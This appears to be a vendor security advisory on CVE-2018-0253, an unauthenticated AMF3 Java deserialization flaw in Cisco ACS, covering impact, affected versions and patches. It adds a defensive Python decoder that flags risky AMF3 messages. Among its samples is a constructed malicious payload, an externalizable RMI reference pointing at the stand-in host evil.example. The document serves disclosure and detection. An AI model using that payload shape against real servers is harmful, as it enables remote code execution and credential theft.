Attackers can obtain the credentials of privileged users and attack systems on the internal network.
Positive Technologies experts Mikhail Klyuchnikov and Yury Aleynov have discovered a critical vulnerability in the web interface of Cisco Access Control Server (ACS). Cisco ACS is a widely deployed solution for centralized authentication, authorization, and accounting (AAA) on corporate networks, and the vulnerability enables an unauthenticated attacker to run arbitrary commands on the server as a privileged user.
Vulnerability CVE-2018-0253 has received a CVSS v3.0 score of 9.8, indicating a critical degree of severity. An attacker already on an internal network can use the vulnerability to modify or collect the credentials of users on network devices, attack other resources on the internal network, or perform man-in-the-middle attacks. And if the Cisco ACS web interface is externally accessible, such actions can be performed from anywhere in the world.
Positive Technologies web application security specialist Mikhail Klyuchnikov described the consequences of this vulnerability: "If Cisco ACS is integrated with Microsoft Active Directory—which is often the case—an attacker can steal the credentials of the domain administrator. When Active Directory integration is absent, the attacker can still obtain control of routers and firewalls in order to intercept traffic, including sensitive data, on the entire network – or access closed-off network segments, such as bank processing systems."
The issue is caused by incorrect server-side handling of AMF3 messages. AMF3 can carry serialized Java objects (objects translated into a byte format suitable for network transmission), and the server deserializes them without restricting which classes may be instantiated. An attacker therefore places a specially prepared serialized object in an AMF3 message; when the server deserializes it, code in that object's class runs, fetches further code from a source chosen by the attacker, and executes it with the privileges of the ACS process.
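The following is an added example, not code from Positive Technologies or Cisco, showing why an AMF3 deserializer is dangerous and how a gateway or IDS rule can screen messages before they reach one. It is a minimal AMF3 decoder in Python that walks a message, records every class name the message asks the server to instantiate, and stops the moment it meets an "externalizable" object, because from that point the byte format is defined only by the named class's readExternal() method and the server would have to run that class's code to continue. The three sample messages are constructed by hand for this example; the class name in the malicious one, sun.rmi.server.UnicastRef, is an RMI reference class whose readExternal() reads a host and port from the payload, which is the kind of JRE class such attacks rely on. The allowlist of accepted class names is a hypothetical placeholder, not Cisco's.

```python
import struct

# AMF3 type markers (subset sufficient for typical request bodies)
AMF3_UNDEFINED, AMF3_NULL, AMF3_FALSE, AMF3_TRUE = 0x00, 0x01, 0x02, 0x03
AMF3_INTEGER, AMF3_DOUBLE, AMF3_STRING = 0x04, 0x05, 0x06
AMF3_ARRAY, AMF3_OBJECT = 0x09, 0x0A

# Hypothetical allowlist: "" is the anonymous object; the other name is a placeholder.
ALLOWED_CLASSES = {"", "flex.messaging.messages.CommandMessage"}


class Externalizable(Exception):
    """Raised when the stream hands control to a class-specific readExternal()."""


class AMF3Reader:
    def __init__(self, data: bytes):
        self.data, self.pos = data, 0
        self.strings, self.objects, self.traits = [], [], []   # AMF3 reference tables
        self.classes = []                                      # class names seen in inline traits

    def u8(self) -> int:
        b = self.data[self.pos]
        self.pos += 1
        return b

    def u29(self) -> int:
        # Variable-length int: up to 3 bytes of 7 bits with a continuation bit, then a full byte.
        n = 0
        for i in range(4):
            b = self.u8()
            if i < 3:
                n = (n << 7) | (b & 0x7F)
                if not b & 0x80:
                    return n
            else:
                n = (n << 8) | b
        return n

    def string(self) -> str:
        ref = self.u29()
        if not ref & 1:                       # low bit 0: reference into the string table
            return self.strings[ref >> 1]
        length = ref >> 1
        s = self.data[self.pos:self.pos + length].decode("utf-8")
        self.pos += length
        if s:                                 # the empty string is never added to the table
            self.strings.append(s)
        return s

    def value(self):
        m = self.u8()
        if m in (AMF3_UNDEFINED, AMF3_NULL):
            return None
        if m == AMF3_FALSE:
            return False
        if m == AMF3_TRUE:
            return True
        if m == AMF3_INTEGER:
            n = self.u29()
            return n - 0x20000000 if n & 0x10000000 else n    # 29-bit two's complement
        if m == AMF3_DOUBLE:
            v = struct.unpack(">d", self.data[self.pos:self.pos + 8])[0]
            self.pos += 8
            return v
        if m == AMF3_STRING:
            return self.string()
        if m == AMF3_ARRAY:
            return self.array()
        if m == AMF3_OBJECT:
            return self.obj()
        raise ValueError(f"unsupported AMF3 marker 0x{m:02x} at offset {self.pos - 1}")

    def array(self):
        ref = self.u29()
        if not ref & 1:
            return self.objects[ref >> 1]
        assoc, dense_count = {}, ref >> 1
        self.objects.append(assoc)
        while (key := self.string()) != "":   # associative part, terminated by ""
            assoc[key] = self.value()
        dense = [self.value() for _ in range(dense_count)]
        return assoc or dense

    def obj(self):
        ref = self.u29()
        if not ref & 1:                       # object reference
            return self.objects[ref >> 1]
        if not ref & 2:                       # traits reference
            name, externalizable, dynamic, members = self.traits[ref >> 2]
        else:                                 # inline traits: flags, class name, member names
            externalizable, dynamic = bool(ref & 4), bool(ref & 8)
            name = self.string()
            members = [self.string() for _ in range(ref >> 4)]
            self.traits.append((name, externalizable, dynamic, members))
            self.classes.append(name)
        if externalizable:
            # Bytes from here on are whatever the named class's readExternal() expects.
            # A Java AMF endpoint instantiates `name` and lets it consume the stream.
            raise Externalizable(name or "<anonymous>")
        result = {"__class__": name}
        self.objects.append(result)
        for member in members:
            result[member] = self.value()
        if dynamic:
            while (key := self.string()) != "":
                result[key] = self.value()
        return result


def inspect_amf3(payload: bytes) -> dict:
    """Decode one AMF3 value and report the indicators a gateway should block on."""
    reader = AMF3Reader(payload)
    finding = {"value": None, "externalizable": None}
    try:
        finding["value"] = reader.value()
    except Externalizable as exc:
        finding["externalizable"] = str(exc)
    finding["classes"] = reader.classes
    finding["unexpected"] = [c for c in reader.classes if c not in ALLOWED_CLASSES]
    finding["block"] = bool(finding["externalizable"] or finding["unexpected"])
    return finding


# Constructed samples (not captured traffic). Byte layout is annotated per field.
BENIGN = (b"\x0a"            # object marker
          b"\x0b"            # traits: inline, dynamic, 0 sealed members
          b"\x01"            # class name "" (anonymous object)
          b"\x05op"          # dynamic key "op"
          b"\x06\x09ping"    # string value "ping"
          b"\x01")           # end of dynamic members
TYPED = (b"\x0a\x13"                       # object; inline traits, 1 sealed member
         b"\x1fcom.example.Foo"            # class name (placeholder, not on the allowlist)
         b"\x03x"                          # sealed member name "x"
         b"\x04\x01")                      # integer 1
MALICIOUS = (b"\x0a\x07"                   # object; inline traits with the externalizable bit set
             b"\x33sun.rmi.server.UnicastRef"
             b"\x00\x00\x00\x0bevil.example\x00\x00\x04\xd2")  # opaque readExternal payload (constructed)

if __name__ == "__main__":
    for label, msg in (("benign", BENIGN), ("typed", TYPED), ("malicious", MALICIOUS)):
        print(label, inspect_amf3(msg))
```

The decoder never instantiates anything, so it is safe to run on hostile input; a real Java endpoint is not, which is why the only complete fix is the vendor patch. Screening for the externalizable trait flag and for class names outside an allowlist is a defense-in-depth measure that catches the payload shape this attack depends on, independent of which gadget class the attacker picks.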
Affected versions include Cisco ACS 5.8 prior to Patch 7 (no authorization required) and 5.8 Patch 7 and Patch 8 (authorization required). To fix the vulnerability, the vendor advises updating servers to 5.8 Patch 9 or later.
To detect malicious activity and manage security events, Positive Technologies offers MaxPatrol SIEM. Earlier in April, 26 new rules were added to MaxPatrol SIEM for detection of Active Directory incidents. Microsoft Active Directory, which is closely integrated with Cisco ACS on many corporate networks, is often a primary target for attackers. Exploitation of the vulnerability can be prevented by PT Application Firewall, which protects against Java deserialization attacks and supports the AMF protocol.